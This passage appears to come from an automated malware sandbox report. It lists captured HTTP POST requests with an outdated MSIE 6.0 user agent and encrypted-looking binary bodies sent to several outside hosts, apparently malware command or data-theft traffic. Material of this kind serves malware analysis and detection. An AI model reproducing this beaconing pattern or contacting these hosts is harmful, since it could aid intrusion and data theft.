U0nC14mWcftuUWB+2C6P9qLHXVSnhtsuzZHmjB5phNRs+Q+GEchq+SPuVEHhEAOLLcvkvRGmdoyc/mlNTe4zRylCRUCAWHWRoLrTETomLO8EKFE6L9TKksalXD9VKgsYOpZYwgZRzVGlFOLHmiJP3eQwNPGniecndd1pMT33qBxGHSsazSs7+j97WchKkdPMxMOI9lvfhTqcpglz0NQiGuL5Bxs73F/KjypJijHjZQQIej8/FjxOkHM8EuIURZG8UBy6VxakkW1o7B42U4H+9km0XmZ+8kThS4Eq9hCJvcGnrLRCZwAZIoek1q1XQT4TUHed9AZm4QF0fukKaDzaHadkrCd6azRfPpgxDCqSTX1rXci+vu4peEIh/ZkAgXgdFwqzzgu1WP+95aMoCoL1GFomYpYhu6Nw8VWFd30edK8RigYSRiro4R6NoTtmvQ0bKQKAIhLAtD0LpZgJZiJCCTh7rI7LvmBft9cltpeYq7mQtagzn82Jk+U0TeYip9NAE++EkyeOD10pUEKAu9qsx8boKOWA/r7OOZhu69c73gk=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 51 42 4a 77 34 4c 4c 65 63 66 74 77 79 4e 35 79 35 53 35 55 48 37 55 6d 64 4f 61 43 34 49 6a 4d 42 72 43 4e 57 70 30 6d 45 30 57 65 7a 52 45 57 65 45 33 4f 72 6e 36 45 52 72 44 32 42 53 5a 62 77 43 51 75 48 70 47 63 45 30 4a 5a 36 33 39 31 45 42 62 34 66 4d 59 65 6d 4d 56 64 67 36 6f 51 51 71 2b 45 71 6d 39 56 6c 7a 6b 6f 4d 4f 47 62 37 2f 72 36 53 32 34 47 61 72 4b 79 61 56 75 71 53 65 48 54 55 54 65 58 54 2b 71 2f 31 78 77 46 78 76 56 76 6e 6f 75 35 49 37 4e 46 47 6e 30 5a 54 6a 41 72 76 38 43 48 76 45 7a 70 53 4b 41 50 48 43 73 63 30 6d 37 79 72 62 35 4f 65 65 4b 42 37 38 66 46 6d 58 63 4e 37 57 64 30 65 55 43 62 4f 74 5a 52 59 44 38 69 73 70 75 47 61 36 4c 5a 34 6d 70 6c 44 4d 49 6b 41 46 70 4d 48 36 4a 33 4b 4b 53 55 61 38 4f 6f 5a 7a 50 69 54 53 4e 6d 75 56 55 41 78 61 32 70 71 6b 67 78 73 41 46 68 61 41 43 6f 68 77 6b 2f 57 34 4e 68 70 5a 37 32 51 38 57 34 4e 79 54 4b 6f 74 54 44 6f 70 76 50 31 42 2b 73 62 64 68 35 38 53 61 63 73 51 5a 6f 53 34 45 78 42 2b 2f 52 4f 78 78 4e 74 6a 7a 4c 37 47 2f 6c 73 57 6d 4b 77 63 48 53 77 69 76 58 32 75 71 47 68 69 63 70 42 6d 71 38 36 45 66 32 46 55 63 75 71 54 6b 30 38 74 66 74 2b 4b 59 63 75 47 54 6b 61 56 30 41 6f 36 43 69 72 62 44 58 78 61 44 59 47 4b 68 70 38 4f 6b 72 48 62 71 41 69 77 63 6a 51 52 58 4b 33 64 4a 67 77 62 47 53 46 65 38 74 70 63 57 63 5a 69 67 41 38 68 69 35 62 47 6a 62 49 2f 52 75 79 47 63 5a 5a 34 68 4a 6b 63 33 64 6b 6a 32 46 4d 63 4c 52 62 67 73 31 38 52 36 41 4d 32 67 4a 4c 2f 33 6f 2f 59 30 48 54 65 6e 52 4c 68 36 58 4f 77 6b 54 6f 30 66 52 78 6d 6e 39 6c 56 53 6f 78 4c 39 2b 32 55 6e 6d 49 67 67 44 44 76 67 6e 33 2b 6e 76 6b 48 6e 4f 70 73 6c 6d 2f 59 79 47 4a 58 52 78 73 68 77 70 74 30 6e 72 43 70 64 43 6b 50 48 46 78 33 33 4c 63 73 58 6e 64 4d 34 5a 30 36 6f 3d Data Ascii: QBJw4LLecftwyN5y5S5UH7UmdOaC4IjMBrCNWp0mE0WezREWeE3Orn6ERrD2BSZbwCQuHpGcE0JZ6391EBb4fMYemMVdg6oQQq+Eqm9VlzkoMOGb7/r6S24GarKyaVuqSeHTUTeXT+q/1xwFxvVvnou5I7NFGn0ZTjArv8CHvEzpSKAPHCsc0m7yrb5OeeKB78fFmXcN7Wd0eUCbOtZRYD8ispuGa6LZ4mplDMIkAFpMH6J3KKSUa8OoZzPiTSNmuVUAxa2pqkgxsAFhaACohwk/W4NhpZ72Q8W4NyTKotTDopvP1B+sbdh58SacsQZoS4ExB+/ROxxNtjzL7G/lsWmKwcHSwivX2uqGhicpBmq86Ef2FUcuqTk08tft+KYcuGTkaV0Ao6CirbDXxaDYGKhp8OkrHbqAiwcjQRXK3dJgwbGSFe8tpcWcZigA8hi5bGjbI/RuyGcZZ4hJkc3dkj2FMcLRbgs18R6AM2gJL/3o/Y0HTenRLh6XOwkTo0fRxmn9lVSoxL9+2UnmIggDDvgn3+nvkHnOpslm/YyGJXRxshwpt0nrCpdCkPHFx33LcsXndM4Z06o=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 74 58 56 2b 77 58 62 64 63 50 73 76 56 6b 44 4e 30 54 62 74 6d 52 6e 47 4f 4f 43 57 45 4d 70 6a 43 70 6d 43 77 43 73 44 75 43 44 65 45 41 48 76 67 43 69 43 6f 7a 61 71 6d 6a 45 77 49 65 41 57 76 44 44 69 48 49 2b 7a 6a 54 71 77 31 61 57 6b 71 36 39 61 6b 43 63 77 59 73 44 2b 73 6e 52 65 52 51 64 42 5a 66 46 69 69 68 50 53 37 35 61 70 52 77 66 47 6e 62 7a 63 67 52 58 62 38 45 58 77 6e 77 55 77 41 67 33 69 30 32 4a 45 69 41 37 30 74 41 62 68 33 2f 71 71 66 44 76 46 70 30 65 6b 62 58 74 5a 67 73 67 62 48 49 4f 44 70 44 33 44 65 75 32 32 35 31 69 4c 71 6f 51 66 55 35 7a 47 45 58 71 75 78 4a 41 45 4a 56 4f 50 65 6e 53 31 38 4d 6c 76 72 75 6c 67 32 58 70 46 4a 43 65 63 50 75 37 4e 4d 62 64 4f 65 43 52 62 37 67 70 5a 4b 42 47 79 4b 31 2b 68 44 2b 34 48 31 32 57 78 6a 42 51 50 43 6c 2b 30 67 75 41 31 6a 42 51 69 43 66 51 33 67 4d 61 53 36 55 47 4c 73 66 53 56 75 5a 37 57 38 5a 53 50 68 69 48 39 65 42 70 69 63 61 51 46 4c 30 30 62 64 76 47 46 6f 65 69 77 73 4d 42 52 53 56 64 6a 79 4c 49 30 7a 35 44 34 50 39 64 6e 53 4f 35 2f 59 2f 76 4d 6e 2b 7a 39 4e 73 5a 75 6b 46 31 64 78 47 59 6a 6e 4d 31 46 6b 5a 36 6c 43 68 33 6a 6d 56 75 78 55 7a 67 55 74 76 53 71 75 44 30 69 75 58 4d 2f 6b 39 69 57 36 78 64 39 34 68 45 79 46 53 6a 6e 79 32 54 34 34 33 6a 71 37 35 73 6a 36 4e 76 39 35 4b 4e 35 70 56 54 61 6c 2b 79 33 58 56 5a 2b 68 2f 59 6e 4f 52 56 30 78 58 73 32 39 2b 79 69 68 6f 56 47 65 53 35 45 72 76 66 6e 72 41 6c 49 78 42 74 33 34 63 34 4a 2b 65 45 4d 66 6d 7a 47 48 2f 65 5a 4c 32 58 48 42 37 53 30 6a 5a 71 47 73 45 57 64 55 54 6f 53 7a 58 6e 57 53 2f 39 31 36 30 78 41 4e 49 4b 63 68 59 47 51 65 76 56 58 39 74 30 53 54 30 61 54 69 41 6d 53 74 71 31 66 79 58 59 38 6a 58 54 79 Data Ascii: tXV+wXbdcPsvVkDN0TbtmRnGOOCWEMpjCpmCwCsDuCDeEAHvgCiCozaqmjEwIeAWvDDiHI+zjTqw1aWkq69akCcwYsD+snReRQdBZfFiihPS75apRwfGnbzcgRXb8EXwnwUwAg3i02JEiA70tAbh3/qqfDvFp0ekbXtZgsgbHIODpD3Deu2251iLqoQfU5zGEXquxJAEJVOPenS18Mlvrulg2XpFJCecPu7NMbdOeCRb7gpZKBGyK1+hD+4H12WxjBQPCl+0guA1jBQiCfQ3gMaS6UGLsfSVuZ7W8ZSPhiH9eBpicaQFL00bdvGFoeiwsMBRSVdjyLI0z5D4P9dnSO5/Y/vMn+z9NsZukF1dxGYjnM1FkZ6lCh3jmVuxUzgUtvSquD0iuXM/k9iW6xd94hEyFSjny2T443jq75sj6Nv95KN5pVTal+y3XVZ+h/YnORV0xXs29+yihoVGeS5ErvfnrAlIxBt34c4J+eEMfmzGH/eZL2XHB7S0jZqGsEWdUToSzXnWS/9160xANIKchYGQevVX9t0ST0aTiAmStq1fyXY8jXTy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 38 58 49 72 31 36 61 52 63 66 76 53 6a 4b 5a 47 51 58 78 78 65 73 6e 31 38 4e 75 47 55 4f 32 63 4f 6a 67 76 50 69 42 49 6f 69 6f 6e 31 4f 31 62 32 59 78 55 35 6e 6b 55 30 66 37 38 41 53 48 50 47 65 37 32 63 74 30 45 73 52 66 4f 73 39 68 33 54 6b 76 7a 4c 50 33 58 74 2b 41 69 47 58 79 45 6b 6a 38 51 63 65 61 66 73 56 73 42 4f 35 45 4b 4a 58 6d 67 4b 6c 41 4b 46 34 65 69 32 57 6a 2f 5a 4e 34 59 32 4c 51 34 7a 36 2b 41 68 41 33 30 66 71 58 38 6b 35 63 6d 45 47 39 72 56 49 56 76 2b 34 63 41 39 51 30 62 54 63 33 39 56 34 42 55 57 78 2f 70 6f 64 36 47 63 5a 64 70 4c 61 4a 4b 31 69 71 36 46 64 30 5a 78 6a 74 62 70 6c 75 76 44 64 73 6f 72 45 64 6e 42 4d 68 66 6b 44 46 58 44 61 55 31 51 62 50 4c 6f 45 44 52 6b 35 6e 31 33 5a 5a 4f 4a 4e 31 58 71 74 59 74 6e 74 34 72 56 58 4a 2f 39 57 52 52 79 5a 66 43 4a 47 77 71 49 74 64 61 71 50 4a 44 56 64 68 58 34 6d 52 32 69 70 77 54 6c 63 6e 57 39 72 6a 78 43 35 64 4b 6a 45 48 54 75 44 2f 62 42 69 5a 67 4f 45 31 6e 49 31 7a 73 37 6a 54 38 39 4b 6f 37 54 70 68 6b 7a 48 32 31 37 32 65 35 35 57 57 54 2f 68 41 55 4b 65 45 36 47 46 56 54 4a 55 49 76 73 4e 48 6d 2b 54 6e 7a 2f 37 41 38 6c 61 65 36 33 39 45 59 58 53 69 4f 57 71 4c 77 6f 58 54 4b 52 55 48 59 67 35 58 4c 78 48 72 38 41 68 77 6d 47 61 79 72 41 74 36 57 38 47 50 44 45 42 53 34 44 69 49 77 6e 4a 2b 4e 59 68 56 56 4f 55 4a 75 51 68 51 44 46 77 42 6c 59 72 63 57 56 38 58 43 6e 6d 48 50 65 51 31 76 49 58 76 65 53 62 74 6f 47 34 47 6d 6a 6f 67 4a 59 4f 35 33 45 6c 30 75 44 30 54 57 44 6a 37 79 47 43 59 75 62 79 54 66 50 61 43 4a 4b 4f 7a 4b 55 78 4b 4b 42 31 76 53 6a 30 38 71 7a 4a 41 59 47 63 35 4c 6c 44 38 37 36 61 64 45 4c 50 70 50 52 55 4c 61 42 43 53 34 70 75 67 5a 57 5a 72 37 72 79 34 41 6a 6f 49 57 48 67 58 38 42 42 65 74 58 2b 30 4e 51 35 72 50 6b 41 3d 3d Data Ascii: 8XIr16aRcfvSjKZGQXxxesn18NuGUO2cOjgvPiBIoion1O1b2YxU5nkU0f78ASHPGe72ct0EsRfOs9h3TkvzLP3Xt+AiGXyEkj8QceafsVsBO5EKJXmgKlAKF4ei2Wj/ZN4Y2LQ4z6+AhA30fqX8k5cmEG9rVIVv+4cA9Q0bTc39V4BUWx/pod6GcZdpLaJK1iq6Fd0ZxjtbpluvDdsorEdnBMhfkDFXDaU1QbPLoEDRk5n13ZZOJN1XqtYtnt4rVXJ/9WRRyZfCJGwqItdaqPJDVdhX4mR2ipwTlcnW9rjxC5dKjEHTuD/bBiZgOE1nI1zs7jT89Ko7TphkzH2172e55WWT/hAUKeE6GFVTJUIvsNHm+Tnz/7A8lae639EYXSiOWqLwoXTKRUHYg5XLxHr8AhwmGayrAt6W8GPDEBS4DiIwnJ+NYhVVOUJuQhQDFwBlYrcWV8XCnmHPeQ1vIXveSbtoG4GmjogJYO53El0uD0TWDj7yGCYubyTfPaCJKOzKUxKKB1vSj08qzJAYGc5LlD876adELPpPRULaBCS4pugZWZr7ry4AjoIWHgX8BBetX+0NQ5rPkA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 74 58 56 2b 77 58 62 64 63 50 73 76 56 6b 44 4e 30 54 62 74 6d 52 6e 47 4f 4f 43 57 45 4d 70 6a 43 70 6d 43 77 43 73 44 75 43 44 65 45 41 48 76 67 43 69 43 6f 7a 61 71 6d 6a 45 77 49 65 41 57 76 44 44 69 48 49 2b 7a 6a 54 71 77 31 61 57 6b 71 36 39 61 6b 43 63 77 59 73 44 2b 73 6e 52 65 52 51 64 42 5a 66 46 69 69 68 50 53 37 35 61 70 52 77 66 47 6e 62 7a 63 67 52 58 62 38 45 58 77 6e 77 55 77 41 67 33 69 30 32 4a 45 69 41 37 30 74 41 62 68 33 2f 71 71 66 44 76 46 70 30 65 6b 62 58 74 5a 67 73 67 62 48 49 4f 44 70 44 33 44 65 75 32 32 35 31 69 4c 71 6f 51 66 55 35 7a 47 45 58 71 75 78 4a 41 45 4a 56 4f 50 65 6e 53 31 38 4d 6c 76 72 75 6c 67 32 58 70 46 4a 43 65 63 50 75 37 4e 4d 62 64 4f 65 43 52 62 37 67 70 5a 4b 42 47 79 4b 31 2b 68 44 2b 34 48 31 32 57 78 6a 42 51 50 43 6c 2b 30 67 75 41 31 6a 42 51 69 43 66 51 33 67 4d 61 53 36 55 47 4c 73 66 53 56 75 5a 37 57 38 5a 53 50 68 69 48 39 65 42 70 69 63 61 51 46 4c 30 30 62 64 76 47 46 6f 65 69 77 73 4d 42 52 53 56 64 6a 79 4c 49 30 7a 35 44 34 50 39 64 6e 53 4f 35 2f 59 2f 76 4d 6e 2b 7a 39 4e 73 5a 75 6b 46 31 64 78 47 59 6a 6e 4d 31 46 6b 5a 36 6c 43 68 33 6a 6d 56 75 78 55 7a 67 55 74 76 53 71 75 44 30 69 75 58 4d 2f 6b 39 69 57 36 78 64 39 34 68 45 79 46 53 6a 6e 79 32 54 34 34 33 6a 71 37 35 73 6a 36 4e 76 39 35 4b 4e 35 70 56 54 61 6c 2b 79 33 58 56 5a 2b 68 2f 59 6e 4f 52 56 30 78 58 73 32 39 2b 79 69 68 6f 56 47 65 53 35 45 72 76 66 6e 72 41 6c 49 78 42 74 33 34 63 34 4a 2b 65 45 4d 66 6d 7a 47 48 2f 65 5a 4c 32 58 48 42 37 53 30 6a 5a 71 47 73 45 57 64 55 54 6f 53 7a 58 6e 57 53 2f 39 31 36 30 78 41 4e 49 4b 63 68 59 47 51 65 76 56 58 39 74 30 53 54 30 61 54 69 41 6d 53 74 71 31 66 79 58 59 38 6a 58 54 79 Data Ascii: tXV+wXbdcPsvVkDN0TbtmRnGOOCWEMpjCpmCwCsDuCDeEAHvgCiCozaqmjEwIeAWvDDiHI+zjTqw1aWkq69akCcwYsD+snReRQdBZfFiihPS75apRwfGnbzcgRXb8EXwnwUwAg3i02JEiA70tAbh3/qqfDvFp0ekbXtZgsgbHIODpD3Deu2251iLqoQfU5zGEXquxJAEJVOPenS18Mlvrulg2XpFJCecPu7NMbdOeCRb7gpZKBGyK1+hD+4H12WxjBQPCl+0guA1jBQiCfQ3gMaS6UGLsfSVuZ7W8ZSPhiH9eBpicaQFL00bdvGFoeiwsMBRSVdjyLI0z5D4P9dnSO5/Y/vMn+z9NsZukF1dxGYjnM1FkZ6lCh3jmVuxUzgUtvSquD0iuXM/k9iW6xd94hEyFSjny2T443jq75sj6Nv95KN5pVTal+y3XVZ+h/YnORV0xXs29+yihoVGeS5ErvfnrAlIxBt34c4J+eEMfmzGH/eZL2XHB7S0jZqGsEWdUToSzXnWS/9160xANIKchYGQevVX9t0ST0aTiAmStq1fyXY8jXTy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 51 56 63 6c 34 5a 58 6b 63 66 73 4d 61 30 58 42 66 4f 7a 58 74 49 36 5a 50 5a 65 6a 75 34 47 6e 6d 5a 6f 72 49 30 51 75 57 4e 79 6b 46 58 6c 55 56 42 72 39 54 34 64 45 57 6f 76 55 57 34 48 42 77 37 74 6c 65 39 43 39 55 76 55 47 39 44 39 36 6d 46 4a 6f 42 6a 38 77 31 70 51 45 30 47 44 4d 63 43 66 6c 6f 67 4e 71 4f 46 49 36 30 38 65 38 77 7a 52 6e 55 56 59 41 47 47 30 65 71 41 64 49 52 63 50 31 30 70 76 76 4f 77 51 51 78 42 72 6e 7a 42 67 67 67 48 6c 62 4a 2f 45 44 79 59 4e 4f 34 77 6b 79 50 4e 69 4a 78 38 78 65 46 67 71 70 38 6e 2f 53 78 50 73 69 6e 64 4d 38 6f 68 75 57 32 67 4c 70 42 41 38 63 4e 65 66 5a 6b 53 4f 70 55 67 54 44 4d 38 66 63 63 43 2b 58 53 2b 54 35 4b 37 74 4e 4b 53 72 2f 71 4a 66 6b 37 35 75 67 65 78 41 4c 36 4e 43 63 51 50 6b 51 4f 58 47 47 6d 61 61 75 4f 34 48 58 67 70 39 69 41 50 31 56 74 6e 36 62 39 48 4f 42 63 69 79 6d 6b 30 46 33 55 35 4d 57 4b 47 47 58 61 34 79 2b 48 7a 62 65 50 43 78 32 74 31 49 38 68 4e 77 65 7a 5a 41 68 77 2f 66 35 58 33 6e 4f 54 74 46 67 56 4b 6a 6f 78 6a 71 56 6d 78 63 68 4e 76 4c 49 78 64 54 73 52 79 71 48 30 6d 68 53 41 58 6b 4e 72 6c 43 77 33 4d 35 61 37 5a 6a 65 30 68 45 2b 59 47 6e 6d 6d 59 43 4f 6a 6d 46 70 4a 33 34 46 4c 38 4f 54 4a 37 2f 4a 51 77 42 56 46 48 54 63 39 67 54 6c 50 34 36 7a 50 47 47 32 5a 72 53 7a 50 68 6e 74 59 70 54 39 65 51 31 48 32 30 6b 30 4f 6c 4b 65 43 45 6e 68 73 4e 35 75 35 65 38 6e 34 6d 39 66 31 54 50 39 37 39 65 36 58 52 57 50 52 2f 6f 30 55 54 71 2f 41 53 70 63 7a 46 68 64 72 73 52 76 61 64 51 31 66 4a 68 58 53 68 55 49 76 48 78 72 75 78 6e 65 46 4e 52 53 61 48 43 76 47 76 54 52 62 55 76 2f 2b 49 67 62 62 4a 38 2f 77 4f 69 34 6d 52 31 36 7a 47 4c 55 4c 6a 39 52 Data Ascii: QVcl4ZXkcfsMa0XBfOzXtI6ZPZeju4GnmZorI0QuWNykFXlUVBr9T4dEWovUW4HBw7tle9C9UvUG9D96mFJoBj8w1pQE0GDMcCflogNqOFI608e8wzRnUVYAGG0eqAdIRcP10pvvOwQQxBrnzBgggHlbJ/EDyYNO4wkyPNiJx8xeFgqp8n/SxPsindM8ohuW2gLpBA8cNefZkSOpUgTDM8fccC+XS+T5K7tNKSr/qJfk75ugexAL6NCcQPkQOXGGmaauO4HXgp9iAP1Vtn6b9HOBciymk0F3U5MWKGGXa4y+HzbePCx2t1I8hNwezZAhw/f5X3nOTtFgVKjoxjqVmxchNvLIxdTsRyqH0mhSAXkNrlCw3M5a7Zje0hE+YGnmmYCOjmFpJ34FL8OTJ7/JQwBVFHTc9gTlP46zPGG2ZrSzPhntYpT9eQ1H20k0OlKeCEnhsN5u5e8n4m9f1TP979e6XRWPR/o0UTq/ASpczFhdrsRvadQ1fJhXShUIvHxruxneFNRSaHCvGvTRbUv/+IgbbJ8/wOi4mR16zGLULj9R
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 38 58 49 72 31 36 61 52 63 66 76 53 6a 4b 5a 47 51 58 78 78 65 73 6e 31 38 4e 75 47 55 4f 32 63 4f 6a 67 76 50 69 42 49 6f 69 6f 6e 31 4f 31 62 32 59 78 55 35 6e 6b 55 30 66 37 38 41 53 48 50 47 65 37 32 63 74 30 45 73 52 66 4f 73 39 68 33 54 6b 76 7a 4c 50 33 58 74 2b 41 69 47 58 79 45 6b 6a 38 51 63 65 61 66 73 56 73 42 4f 35 45 4b 4a 58 6d 67 4b 6c 41 4b 46 34 65 69 32 57 6a 2f 5a 4e 34 59 32 4c 51 34 7a 36 2b 41 68 41 33 30 66 71 58 38 6b 35 63 6d 45 47 39 72 56 49 56 76 2b 34 63 41 39 51 30 62 54 63 33 39 56 34 42 55 57 78 2f 70 6f 64 36 47 63 5a 64 70 4c 61 4a 4b 31 69 71 36 46 64 30 5a 78 6a 74 62 70 6c 75 76 44 64 73 6f 72 45 64 6e 42 4d 68 66 6b 44 46 58 44 61 55 31 51 62 50 4c 6f 45 44 52 6b 35 6e 31 33 5a 5a 4f 4a 4e 31 58 71 74 59 74 6e 74 34 72 56 58 4a 2f 39 57 52 52 79 5a 66 43 4a 47 77 71 49 74 64 61 71 50 4a 44 56 64 68 58 34 6d 52 32 69 70 77 54 6c 63 6e 57 39 72 6a 78 43 35 64 4b 6a 45 48 54 75 44 2f 62 42 69 5a 67 4f 45 31 6e 49 31 7a 73 37 6a 54 38 39 4b 6f 37 54 70 68 6b 7a 48 32 31 37 32 65 35 35 57 57 54 2f 68 41 55 4b 65 45 36 47 46 56 54 4a 55 49 76 73 4e 48 6d 2b 54 6e 7a 2f 37 41 38 6c 61 65 36 33 39 45 59 58 53 69 4f 57 71 4c 77 6f 58 54 4b 52 55 48 59 67 35 58 4c 78 48 72 38 41 68 77 6d 47 61 79 72 41 74 36 57 38 47 50 44 45 42 53 34 44 69 49 77 6e 4a 2b 4e 59 68 56 56 4f 55 4a 75 51 68 51 44 46 77 42 6c 59 72 63 57 56 38 58 43 6e 6d 48 50 65 51 31 76 49 58 76 65 53 62 74 6f 47 34 47 6d 6a 6f 67 4a 59 4f 35 33 45 6c 30 75 44 30 54 57 44 6a 37 79 47 43 59 75 62 79 54 66 50 61 43 4a 4b 4f 7a 4b 55 78 4b 4b 42 31 76 53 6a 30 38 71 7a 4a 41 59 47 63 35 4c 6c 44 38 37 36 61 64 45 4c 50 70 50 52 55 4c 61 42 43 53 34 70 75 67 5a 57 5a 72 37 72 79 34 41 6a 6f 49 57 48 67 58 38 42 42 65 74 58 2b 30 4e 51 35 72 50 6b 41 3d 3d Data Ascii: 8XIr16aRcfvSjKZGQXxxesn18NuGUO2cOjgvPiBIoion1O1b2YxU5nkU0f78ASHPGe72ct0EsRfOs9h3TkvzLP3Xt+AiGXyEkj8QceafsVsBO5EKJXmgKlAKF4ei2Wj/ZN4Y2LQ4z6+AhA30fqX8k5cmEG9rVIVv+4cA9Q0bTc39V4BUWx/pod6GcZdpLaJK1iq6Fd0ZxjtbpluvDdsorEdnBMhfkDFXDaU1QbPLoEDRk5n13ZZOJN1XqtYtnt4rVXJ/9WRRyZfCJGwqItdaqPJDVdhX4mR2ipwTlcnW9rjxC5dKjEHTuD/bBiZgOE1nI1zs7jT89Ko7TphkzH2172e55WWT/hAUKeE6GFVTJUIvsNHm+Tnz/7A8lae639EYXSiOWqLwoXTKRUHYg5XLxHr8AhwmGayrAt6W8GPDEBS4DiIwnJ+NYhVVOUJuQhQDFwBlYrcWV8XCnmHPeQ1vIXveSbtoG4GmjogJYO53El0uD0TWDj7yGCYubyTfPaCJKOzKUxKKB1vSj08qzJAYGc5LlD876adELPpPRULaBCS4pugZWZr7ry4AjoIWHgX8BBetX+0NQ5rPkA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 4c 52 38 57 64 31 45 54 66 2f 76 69 54 34 4c 53 38 44 52 2b 68 71 6f 48 33 58 6b 50 4e 35 30 4b 46 66 2b 71 77 6a 69 69 30 44 47 32 2b 57 71 4c 74 36 61 49 65 79 76 67 7a 32 7a 45 71 71 78 5a 6d 41 6a 7a 33 66 45 41 39 68 75 44 58 43 55 58 57 5a 56 62 41 75 6e 45 72 66 41 76 55 37 34 42 6f 43 41 31 38 53 74 55 51 52 7a 35 42 57 73 36 43 54 2b 4f 70 39 55 43 46 72 47 34 4f 73 59 79 56 69 4f 4a 76 45 55 61 32 52 43 4c 4f 61 51 67 45 65 53 4b 79 47 78 32 52 49 76 65 6a 71 2f 61 44 46 56 53 6e 6b 67 32 76 52 4c 58 2f 32 34 2b 75 4a 5a 4e 44 2b 5a 55 74 57 6e 67 66 79 31 51 4a 52 76 31 45 57 4d 4a 69 63 44 31 6d 4d 55 62 34 53 39 6f 33 38 51 6e 6c 79 52 6e 2f 6f 55 7a 6c 67 42 2f 76 78 63 6f 52 58 45 70 52 46 38 43 34 48 34 54 61 6f 65 4d 4d 63 5a 74 78 50 64 4c 39 4c 65 58 38 72 39 76 65 52 38 67 4a 43 55 49 61 78 41 73 52 43 70 74 38 55 49 41 49 4b 43 2f 59 50 70 4c 6a 51 67 56 4d 4d 53 41 76 32 32 43 4a 30 33 52 4b 37 68 37 42 79 44 4f 53 34 52 49 50 51 54 45 55 4b 36 6f 50 66 31 57 58 7a 6e 65 39 4b 6e 69 78 57 7a 4b 53 55 73 7a 7a 44 58 71 4c 62 6e 50 6a 63 78 62 6a 35 54 6d 5a 64 37 70 33 46 6b 6d 76 37 7a 6c 31 51 47 58 2b 75 54 6a 4b 65 35 63 46 32 49 51 50 61 5a 46 56 6e 64 46 56 6f 6f 73 45 63 42 47 4b 41 5a 53 6d 6a 2b 6b 65 55 47 46 49 45 44 58 4d 2b 6f 52 62 4c 4f 76 2b 75 36 4b 6e 77 4b 41 44 5a 74 58 71 54 54 4b 5a 66 38 44 47 70 58 4f 2b 4a 37 54 66 79 73 4c 4e 4f 6e 57 38 37 56 49 70 4c 33 4c 50 58 6e 36 58 70 43 58 2f 35 4b 57 35 6a 4d 62 51 71 38 79 30 4c 5a 62 51 58 41 77 6f 44 76 48 70 34 62 79 44 2b 74 59 44 71 32 72 45 4b 64 6c 75 72 49 77 67 69 79 6a 6d 53 37 35 32 38 4c 72 79 4c 43 4d 47 76 49 56 34 35 4f 69 4c 56 4f 5a 35 6a 5a 31 6a 68 44 2f 63 31 33 34 38 44 7a 74 64 30 4f 61 51 69 30 32 62 77 3d 3d Data Ascii: LR8Wd1ETf/viT4LS8DR+hqoH3XkPN50KFf+qwjii0DG2+WqLt6aIeyvgz2zEqqxZmAjz3fEA9huDXCUXWZVbAunErfAvU74BoCA18StUQRz5BWs6CT+Op9UCFrG4OsYyViOJvEUa2RCLOaQgEeSKyGx2RIvejq/aDFVSnkg2vRLX/24+uJZND+ZUtWngfy1QJRv1EWMJicD1mMUb4S9o38QnlyRn/oUzlgB/vxcoRXEpRF8C4H4TaoeMMcZtxPdL9LeX8r9veR8gJCUIaxAsRCpt8UIAIKC/YPpLjQgVMMSAv22CJ03RK7h7ByDOS4RIPQTEUK6oPf1WXzne9KnixWzKSUszzDXqLbnPjcxbj5TmZd7p3Fkmv7zl1QGX+uTjKe5cF2IQPaZFVndFVoosEcBGKAZSmj+keUGFIEDXM+oRbLOv+u6KnwKADZtXqTTKZf8DGpXO+J7TfysLNOnW87VIpL3LPXn6XpCX/5KW5jMbQq8y0LZbQXAwoDvHp4byD+tYDq2rEKdlurIwgiyjmS7528LryLCMGvIV45OiLVOZ5jZ1jhD/c1348Dztd0OaQi02bw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6c 67 51 64 66 57 31 46 66 2f 73 59 61 35 76 73 5a 4f 63 7a 66 79 59 6f 49 41 5a 62 79 61 74 36 38 61 51 36 6d 30 41 35 33 44 5a 72 4e 57 6f 48 72 54 74 4c 65 63 35 31 55 59 54 74 78 32 36 77 67 42 4f 44 45 50 77 62 49 37 39 68 2b 74 79 68 36 69 59 6a 7a 6b 77 55 33 6b 42 44 68 61 47 51 71 5a 4c 65 54 32 2b 59 44 6b 68 6b 55 41 34 67 6b 42 34 33 58 50 6f 4f 4b 61 51 2b 47 6f 34 52 46 56 6f 34 41 4a 4b 4e 72 74 71 57 55 77 49 44 68 6a 55 6b 78 35 64 72 4f 63 42 63 7a 75 79 53 62 73 42 4e 38 6f 36 2b 48 62 4a 31 32 4d 57 33 62 4c 64 4f 63 4a 48 47 6c 38 37 38 6a 59 53 